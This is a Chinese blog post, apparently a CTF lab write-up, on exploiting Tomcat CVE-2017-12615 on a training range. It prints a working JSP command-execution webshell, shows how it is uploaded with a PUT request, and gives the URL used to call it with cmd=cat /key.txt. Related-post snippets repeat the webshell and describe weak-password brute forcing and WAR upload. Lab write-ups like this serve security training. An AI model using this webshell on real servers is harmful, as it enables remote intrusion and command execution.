墨者Tomcat 远程代码执行漏洞利用(第1题)题解

最新推荐文章于 2024-04-21 23:55:54 发布

铁锤2号

最新推荐文章于 2024-04-21 23:55:54 发布

阅读量362

点赞数

分类专栏：做题记录文章标签：安全

本文链接：https://blog.csdn.net/zr1213159840/article/details/122451328

版权

做题记录专栏收录该内容

38 篇文章 0 订阅

订阅专栏

查找了下，这题似乎是CVE-2017-12615，具体链接参考：https://vulhub.org/#/environments/tomcat/CVE-2017-12615/
首先我们对页面进行抓包
在这里插入图片描述
将抓到的包放到重放器中，将GET修改为OPTIONS，然后查看有哪些可以选择的请求方法，可以看到支持的方法有6种。

再将options改为PUT，然后写入jsp的木马，木马如下

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {
StringBuilder line = new StringBuilder();
try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;while ((temp = buf.readLine()) != null) {
line.append(temp+"\n");}buf.close();} catch (Exception e) {
line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

在PUT后面定义好上传的文件的名字，注意格式。然后点击send，能看到创建成功。
在这里插入图片描述

然后访问以下地址，即可获得key

http://219.153.49.228:40884/1.jsp?cmd=cat%20/key.txt&pwd=023

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

铁锤2号

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Tomcat 弱口令及文件上传漏洞复现

君莫hacker的博客

09-16

3414

目录0x01 漏洞介绍0x02 环境部署：0x03 漏洞复现 0x01 漏洞介绍漏洞描述漏洞编号受影响版本 0x02 环境部署：搭建一次，复现百次靶机 ip：192.168.30.209 kali ip：192.168.30.182 0x03 漏洞复现从github下载tomcat8的源码，我们可以查看到tomcat的默认登录名为tomcat，并且密码也为tomcat 点击Server Status进行登录弱口令tomcat tomcat 直接登录成功发现文件上传点

Tomcat任意文件上传CVE-2017-12615漏洞JSP利用脚本

zhlhely的博客

09-27

590

#! -*- coding:utf-8 -*- import requests import sys body = ''' <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try...

参与评论您还未登录，请先登录后发表或查看评论

Tomcat弱口令及war包漏洞复现（保姆级教程）

最新发布

m0_69043895的博客

04-21

2042

这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解，将可能存在的username放入position1的位置，其次放置password在position3的位置，最后attack时爆破的顺序如下图，就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过，当同一账号大于5次登录，就会采用脏数据去进行登录，直到缓存占满后，又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名，比如我这里就是http://IP/shell/shell.jsp。

Tomcat漏洞(弱口令war包)详解

xinyue9966的博客

02-17

4957

后台弱口令上传war包影响版本：Tomcat版本：7.0–>8.0 影响说明：后台弱口令登录，上传webshell 环境说明：PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建东塔靶场漏洞原理 tomcat存在管理后台进行应用部署管理，且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令，攻击者容易进行暴力破解登录后台并进行应用管理。 tomcat是一个中间件，在B/S架构中，浏览器发出的http请求经过tpmcat中间件，转发到最终的目的服务器上

Tomcat弱口令扫描工具

07-18

Tomcat弱口令扫描工具，可自己写字典进行爆破。

墨者_Tomcat 远程代码执行漏洞利用(第1题)

weixin_50698958的博客

10-12

441

靶场： https://www.mozhe.cn/bug/detail/WFVzRjBLZjFObGE4YjFwaGhXLzVldz09bW96aGUmozhe 背景介绍 “墨者”工程师对一个已经授权的网站进行测试，发现全是静态页面。以为没有漏洞，但在测试环境时发现Web 应用服务器是Tomcat，版本为7.0.79。你能找到漏洞吗？实训目标 1、了解Tomcat配置； 2、了解特定版本的Tomcat漏洞； 3、掌握Tomcat远程代码执行漏洞的利用方式；解题方向通过Tomcat的代

墨者学院 - Tomcat 远程代码执行漏洞利用(第1题)

多崎巡礼的博客

09-17

1309

刷新fit网站 burp截包，repeater，更改不安全的HTTP方法为PUT（将get更改为options可查看服务器支持哪些） PUT /自定义文件名/ HTTP/1.1 eg: PUT /9.jsp/ HTTP/1.1 (jsp后无空格，反之会报错) 添加以下代码 <%@ page language="java" import="java.util.*,ja...

墨者学院-Tomcat 远程代码执行漏洞利用(第1题)

JimWu的博客

09-04

536

Tomcat 远程代码执行漏洞利用(第1题) 难易程度:★★★ 题目类型:命令执行使用工具:FireFox浏览器、burpsuite 1.打开burpsuite，访问网页，截包。 2.send to repeater，把GET改成OPTIONS，查看请求方式。 3.再将OPTIONS改为PUT，加上/1.jsp，在下方写入jsp木马。 <%@ page language="java" i...

【墨者学院】Tomcat后台弱口令漏洞利用

weixin_43884770的博客

12-06

1354

背景介绍 “墨者”安全工程师发现某个基于Tomcat的Web服务器后台存在漏洞，你也一起来学习吧。实训目标 1、了解Tomcat服务器的基本操作； 2、了解Tomcat服务器War包部署功能；解题方向网站常用后台弱密码登录，部署war包。解题思路: 随便点击一个地方会跳出登录页面，发现提示输入用户名密码，题目提示存在弱口令，于是网上查找了tomcat默认的用户名密码，发现都不对，最后自己...

针对Tomcat 远程代码执行漏洞（CVE-2017-12615）的一次实战

看不尽的尘埃——博客

01-20

3346

前言今天想多实践实践Tomcat中间件的漏洞。于是乎，把墨者学院的靶场全做了。下面来看一下对Tomcat 远程代码执行漏洞的一次战斗！一开始拿到这个靶场时，都不知道该如何入手，于是去百度搜了相关资料。找到了一篇好文章，写的简单明了！阅读完后，发现要复现和利用还是很简单的。只要一个burp工具就够了！ https://www.freebuf.com/vuls/148283.html...

Tomcat弱口令扫描器

05-08

弱口令扫描的工具有很多中，而在这其中，比较优秀的一款就是Tomcat，用起来很方便。希望上传给大家共享，也为了以后自己方便查找。

tomcat弱口令扫描器

08-12

tomcat弱口令扫描器

Tomcat弱口令利用工具

09-03

Tomcat弱口令利用工具,很好用的工具

tomcat 弱口令【tomcat8】

向安全进发的博客

04-20

930

Tomcat支持后台部署War文件，默认情况下管理页面仅允许本地访问。攻击条件：如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问（需求），且恶意攻击者拿到管理界面账户密码情况下，则可上传木马文件，控制系统。==

tomcat弱口令

灰太的表格的博客

08-20

1106

tomcat弱口令 1.前置知识 war包： war是一种web应用程序格式，包含了web应用程序中的所有内容。在这个文件中的所有内容将按一定的目录结构来组织，一般情况下war文件中包含了html,jsp文件或者含有这两种文件的目录。另外它里面还含有一个web-inf目录，在这个目录下存放的是应用配置文件web.xml以及classes目录，classes目录里面包含了编译好的Servlet类和Jsp或Servlet所依赖的其它类。由于war文件将所有的文件合并成一个，因此减少了文件的传输时间 2.漏洞环境

Tomcat管理页面弱口令页面Getshell

weixin_45253622的博客

03-06

5370

Tomcat管理页面弱口令页面Getshell 传送门 Tomcat安装完成后，点击页面的 Manager App 处会弹出输入用户名和密码的认证框。我们也可以直接访问：http://127.0.0.1:8080/manager/html 来访问该管理页面。但是默认情况下，该页面只允许 tomcat 本机访问，其他主机访问时会显示403。这时，只需要修改 webapps\manager\META-INF\context.xml 文件，注释下如下行即可。此时，需要我们输入用户名和密码进行登录。

tomcat弱口令漏洞复现

薛定谔嘚喵博客

04-19

258

●Tomcat 部署●开启管理控制台远程访问●配置管理控制台密码●通过弱口令GetShell。

Tomcat 弱口令漏洞复现

weixin_53696027的博客

02-13

1093

vulhub靶场漏洞复现详细过程

Tomcat后台管理漏洞复现(弱口令＋上传webshell)_tomcat文件上传漏洞复现

04-15

1024

web.xml 是这个应用的配置文件，而 classes 目录下则包含编译好的 servlet 类和 jsp，或者 servlet 所依赖的其他类（如 JavaBean）。1.3将抓到的包发送到爆破模块,快捷键ctrl+i，正常来说是用常见的弱口令字典去爆破，或者更强大的字典进行爆破，为了节省时间，这里就随便输入了几个账号密码。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。当然，如果是一个未知的后台登录，且可能存在弱口令，则使用Burp Suite进行抓包暴力破解，下面简单进行演示。

墨者-sql手工注入漏洞测试

04-29

墨者安全团队是一支专注于网络安全领域的团队，他们致力于网络安全研究和技术推广。其中，手工注入漏洞测试是他们的一项重要工作之一。在进行手工注入漏洞测试时，墨者安全团队通常会通过一系列的步骤来进行测试。...